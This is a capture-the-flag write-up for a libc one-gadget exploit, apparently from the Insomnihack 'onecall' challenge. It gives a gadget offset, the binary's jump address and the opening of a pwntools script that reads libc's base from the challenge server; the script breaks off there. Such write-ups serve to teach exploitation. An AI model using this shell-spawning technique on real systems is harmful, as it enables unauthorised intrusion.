Rating: 4.0

Under x86/x64 there are so called "magic addresses" or "one gadgets" that allow you to get a shell just by jumping to that specific address within libc. You don't have to set up stack arguments, you just need to jump there [1] [2]. For this challange we tried to find such an address as well but did have problems finding it within do_system (called by system within libc). After a while we looked for different addresses where the string '/bin/sh" was used (e.g., via IDA x key on the string "/bin/sh") and we found a working address near that address at 0x9B9A0. This means we just have to get the libc base address from the provided memory mappings and add 0x9B9A0 to it to get the final address. All is left is to send the program this address and it jumps to it (BLR X1 at 0x40097C within the onecall binary).

That's all!

Here is the full code:

python
#!/usr/bin/env python2

from pwn import *
import struct

p = remote("onecall.teaser.insomnihack.ch", 1337)

mapping = p.recvuntil("Where do we go from here ?").split("\n")

LIBC_BASE = None

for line in mapping:
if "libc.so.6" in line:
LIBC_BASE = int(line.split("-")[0], 16)
break